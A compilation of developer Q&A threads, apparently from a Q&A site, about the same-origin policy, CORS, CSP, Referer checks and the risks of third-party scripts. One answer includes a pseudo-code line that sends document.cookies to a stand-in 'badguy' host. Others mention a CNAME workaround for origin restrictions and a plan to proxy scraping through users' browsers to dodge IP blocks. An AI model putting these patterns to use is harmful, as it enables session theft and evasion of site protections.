I'm writing a web app with Javascript which needs to access a third-party API (located on x.apisite.com and y.apisite.com). I was using XMLHTTPRequest, but when serving the files from my own local server, this fails because of the same-origin policy.
Now, this web app is supposed to be installed on my mobile device, where any downloaded files will be cached. So, I changed my DNS entries to point x.apisite.com and y.apisite.com to my own local server. I then download the files and then change the DNS entries back to the correct ones. I thought that since the browser thinks that the scripts were downloaded from *.apisite.com, I could now make XMLHTTPRequests to *.apisite.com. However, this does not seem to be the case, I still get same-origin policy errors.
What am I doing wrong?
Here's the basic idea of what I'm doing:
<!DOCTYPE html>
<html>
<head>
<!-- this will actually be downloaded from my own local server -->
<script src="http://x.apisite.com/script-0.js">
<script src="http://y.apisite.com/script-1.js">
...
In script-0.js, I make an XMLHTTPRequest to x.apisite.com, and likewise in script-1.js, I access y.apisite.com.
Practical answer (not recommended): Create CNAME records to the third-party domains from domains that you control, then use those domains and hope that the hosts of the third-party aren't looking at the HTTP Host header. Note that this wouldn't work if the clients attempt to authenticate the third-party hosts either; for example when using HTTPS (some client browsers may force the use of HTTPS in certain scenarios).
Ideal answer: Ask the third-party to authorize requests made by code that came from your origin domain using CORS (some hosts already allow requests from code from any origin, you should check that).
Alternative: If the third-party doesn't want to give clients the go-ahead to make cross-origin requests with code from your domain, then you have to make those requests yourself (from your server). The code you send to the client browsers will then only interact with the same origin, but this also means that users will have to trust you with their credentials if you're proxying requests for them (if that's relevant), or you must have credentials of your own to authenticate your server to the third-party hosts, which allow you to do whatever it is you want to do there. It also means you take the traffic load as well, which may or may not be heavy depending on the application. There are potentially many other implications, which all derive from the fact that you explicitly take responsibility for these requests.
Note: While this may sound a bit complicated, it may be useful to understand the trust mechanics between the user, the user's client browser, the code executing in the browser, the origin of that code, and the domains to which that code makes requests. Always keep in mind the best interests of each party in mind and it'll be easy to find a solution for your specific problem.
Final answer (everybody hates it, but you probably expected it): "It depends on what exactly you're trying to do." (Sorry.)
Related
I have a logic written on my server mostly doing curl requests (e.g. accessing social networks). though, some of the sites, will be blocking my server(s) IPs soon.
I can of course, use VPN or deploy multiple servers per location, but it won't get accurate, and still some of the networks might get block the user account.
I am trying to find creative solution to run it from the user browser (it is ok to ask for his permission, as it is an action he is explicitly trying to execute) Though I am trying to avoid extra installations (e.g. downloadable plugins\extension or a desktop app)
Is there a way to turn the client browser into a server-proxy, to run those curl-calls from his machine instead of sending it from my own server? (e.g. using web-sockets, polling, etc.)
It depends on exactly what sort of curl requests you are making. In theory, you could simulate these using an XMLHttpRequest. However, for security reasons these are generally not allowed to access resources hosted on a different site. (Imagine the sort of issues it could cause for instance if visiting any website could cause your browser to start making requests to Facebook to send messages on your behalf.) Basically it will depend on the Cross-origin request policy of the social networks that you are querying. If the requests being sent are intended to be publicly available without authentication then it is possible that your system will work, otherwise it will probably be blocked.
I have some HTML/PHP pages that include javascript calls.
Those calls points on JS/PHP methods included into a library (PIWIK) stored onto a distant server.
They are triggered using an http://www.domainname.com/ prefix to point the correct files.
I cannot modify the source code of the library.
When my own HTML/PHP pages are locally previewed within a browser, I mean using a c:\xxxx kind path, not a localhost://xxxx one, the distant script are called and do their process.
I don't want this to happen, only allowing those scripts to execute if they are called from a www.domainname.com page.
Can you help me to secure this ?
One can for sure directly bypass this security modifying the web pages on-the-fly with some browser add-on while browsing the real web site, but it's a little bit harder to achieve.
I've opened an issue onto the PIWIK issue tracker, but I would like to secure and protect my web site and the according statistics as soon as possible from this issue, waiting for a further Piwik update.
EDIT
The process I'd like to put in place would be :
Someone opens a page from anywhere than www.domainname.com
> this page calls a JS method on a distant server (or not, may be copied locally),
> this script calls a php script on the distant server
> the PHP script says "hey, from where damn do yo call me, go to hell !". Or the PHP script just do not execute....
I've tried to play with .htaccess for that, but as any JS script must be on a client, it blocks also the legitimate calls from www.domainname.com
Untested, but I think you can use php_sapi_name() or the PHP_SAPI constant to detect the interface PHP is using, and do logic accordingly.
Not wanting to sound cheeky, but your situation sounds rather scary and I would advise searching for some PHP configuration best practices regarding security ;)
Edit after the question has been amended twice:
Now the problem is more clear. But you will struggle to secure this if the JavaScript and PHP are not on the same server.
If they are not on the same server, you will be reliant on HTTP headers (like the Referer or Origin header) which are fakeable.
But PIWIK already tracks the referer ("Piwik uses first-party cookies to keep track some information (number of visits, original referrer, and unique visitor ID)" so you can discount hits from invalid referrers.
If that is not enough, the standard way of being sure that the request to a web service comes from a verified source is to use a standard Cross-Site Request Forgery prevention technique -- a CSRF "token", sometimes also called "crumb" or "nonce", and as this is analytics software I would be surprised if PIWIK does not do this already, if it is possible with their architecture. I would ask them.
Most web frameworks these days have CSRF token generators & API's you should be able to make use of, it's not hard to make your own, but if you cannot amend the JS you will have problems passing the token around. Again PIWIK JS API may have methods for passing session ID's & similar data around.
Original answer
This can be accomplished with a Content Security Policy to restrict the domains that scripts can be called from:
CSP defines the Content-Security-Policy HTTP header that allows you to create a whitelist of sources of trusted content, and instructs the browser to only execute or render resources from those sources.
Therefore, you can set the script policy to self to only allow scripts from your current domain (the filing system) to be executed. Any remote ones will not be allowed.
Normally this would only be available from a source where you get set HTTP headers, but as you are running from the local filing system this is not possible. However, you may be able to get around this with the http-equiv <meta> tag:
Authors who are unable to support signaling via HTTP headers can use tags with http-equiv="X-Content-Security-Policy" to define their policies. HTTP header-based policy will take precedence over tag-based policy if both are present.
Answer after question edit
Look into the Referer or Origin HTTP headers. Referer is available for most requests, however it is not sent from HTTPS resources in the browser and if the user has a proxy or privacy plugin installed it may block this header.
Origin is available for XHR requests only made cross domain, or even same domain for some browsers.
You will be able to check that these headers contain your domain where you will want the scripts to be called from. See here for how to do this with htaccess.
At the end of the day this doesn't make it secure, but as in your own words will make it a little bit harder to achieve.
Regarding source maps, I came across a strange behavior in chromium (build 181620).
In my app I'm using minified jquery and after logging-in, I started seeing HTTP requests for "jquery.min.map" in server log file. Those requests were lacking cookie headers (all other requests were fine).
Those requests are not even exposed in net tab in Developer tools (which doesn't bug me that much).
The point is, js files in this app are only supposed to be available to logged-in clients, so in this setup, the source maps either won't work or I'd have to change the location of source map to a public directory.
My question is: is this a desired behavior (meaning - source map requests should not send cookies) or is it a bug in Chromium?
The String InspectorFrontendHost::loadResourceSynchronously(const String& url) implementation in InspectorFrontendHost.cpp, which is called for loading sourcemap resources, uses the DoNotAllowStoredCredentials flag, which I believe results in the behavior you are observing.
This method is potentially dangerous, so this flag is there for us (you) to be on the safe side and avoid leaking sensitive data.
As a side note, giving jquery.min.js out only to logged-in users (that is, not from a cookieless domain) is not a very good idea to deploy in the production environment. I;m not sure about your idea behind this, but if you definitely need to avoid giving the file to clients not visiting your site, you may resort to checking the Referer HTTP request header.
I encountered this problem and became curious as to why certain authentication cookies were not sent in requests for .js.map files to our application.
In my testing using Chrome 71.0.3578.98, if the SameSite cookie atttribute is set to either strict or lax for a cookie, Chrome will not send that cookie when requesting the .js.map file. When there is no sameSite restriction, the cookie will be sent.
I'm not aware of any specification of the intended behavior.
Meaning if I have a website and I link to a external .js file, say for jquery or some widget service, they can pretty easy just pull by authentication cookie and then login as me correct?
What if I am under SSL?
If you include Javascript or JSONP code from another domain, that code has full client-side power and can do whatever it wants.
It can send AJAX requests to automatically make your user do things, and it can steal document.cookie.
If your authentication cookies are HTTP-only, it can't steal them, but it can still impersonate the user using AJAX.
Never include a JS file from a domain you don't trust.
If your page uses SSL, all Javascript files must also use SSL, or an attacker can modify the un-encrypted Javascript to do whatever he wants.
For this reason, browsers will show a security warning if an SSL page uses non-SSL resources.
Note that JSONP is no exception to this rule.
Any JSONP response has full access to your DOM.
If security is a concern, do not use untrusted JSONP APIs.
I can only agree with SLaks and Haochi (+1 and all).
It is extremely insecure and you should never do it even if you trust the domain. Don't trust the answers that tell you that this is not the case because they are just wrong.
This is why now literally all of the links to JavaScript libraries hosted on Google's CDN on the Developer's Guide to Google Libraries API are secure HTTPS links, even though encrypting all of that traffic means a huge overhead even for Google.
They used to recommend using HTTPS only for websites that use HTTPS themselves, now there are no HTTP links in the examples at all.
The point is that you can trust Google and their CDN, but you can never trust the local dns and routers in some poor schmuck's cafe from which your visitors may be connecting to your website and Google's CDN is a great target for obvious reasons.
It depends on what do you mean by "pull". As others have said here, cookies are only sent to where it is originated from. However, a third-party (with malicious intent) file, can still send your cookies back to their server by executing some JavaScript code like
// pseudo-code
cookie_send("http://badguy.tld/?"+document.cookies)
So, only include scripts from trusted sources (Google, Facebook, etc)
No, because cookies for your site will only be sent to your domain.
For example when your browser sees yoursite.com it will send the authentication cookie for yoursite.com. If it also has to make a different request for jquery (for the .js script) it won't send the cookie for yoursite.com (but it will send a jquery cookie - assuming one exists).
Remember every resource is a seperate request under HTTP.
I am not sure HttpOnly is fully supported across all browsers, so I wouldn't trust it to prevent attacks by itself.
If you're worried about a 3rd party attacker (i.e., not the site offering the JS file) grabbing the cookies, definitely use SSL and secure cookies.
If your page isn't running on SSL, using HttpOnly cookies doesn't actually prevent a man-in-the-middle attack, since an attacker in the middle can intercept the cookies regardless by just pretending to be your domain.
If you don't trust the host of an external .js file, don't use the external .js file. An external js file can rewrite the entire page DOM to ask for a CC to be submitted to anyone and have it look (to an average user) the same as your own page, so you're pretty much doomed if you're getting malicious .js files. If you're not sure if a .js host is trustworthy, host a copy of it locally (and check the file for security holes) or don't use it at all. Generally I prefer the latter.
In the specific case of JQuery, just use the copy on Google's CDN if you can't find a copy you like better.
Cookies are domain specific, guarded by same origin policy.
I have a server on our company intranet that runs JBoss. I want to send API calls to this server from my machine, also on the intranet, and get the resulting XML responses using JQuery.
I read the entry on Wikipedia but am confused how that applies to my situation, since our machines only have IP addresses, not domain names.
I have
server URL: 10.2.200.3:8001/serviceroot/service
client IP address: 10.2.201.217
My questions are:
As far as I understand these are different domains, right? So I have to use a proxy to issue JQuery.ajax calls to the server
If I want to avoid doing (2), can I install Apache on the server and server the page with JS code form there? But then the JS will be from 10.2.200.3 and the server is at 10.2.200.3:8001. Aren't these considered different domains according to policy?
Thanks!
Yes.
Yes, different ports mean different origins. This is something that most browsers have done in JS for a while, but it is explicitly described in the HTML5 draft, which is referenced by the XMLHttpRequest draft.
If A and B have port components that are not identical, return false.
If the port, or address are different, they are different domains. If you need to access information from what is effectively another server you really have two options. One is to write some sort of reverse proxy to pass your requests from the same origin server to the secondary server.
Alternatively, if you are in control of the secondary target, and there's no security risk in providing direct access, you could consider adjusting the secondary server to emit JSON-P responses.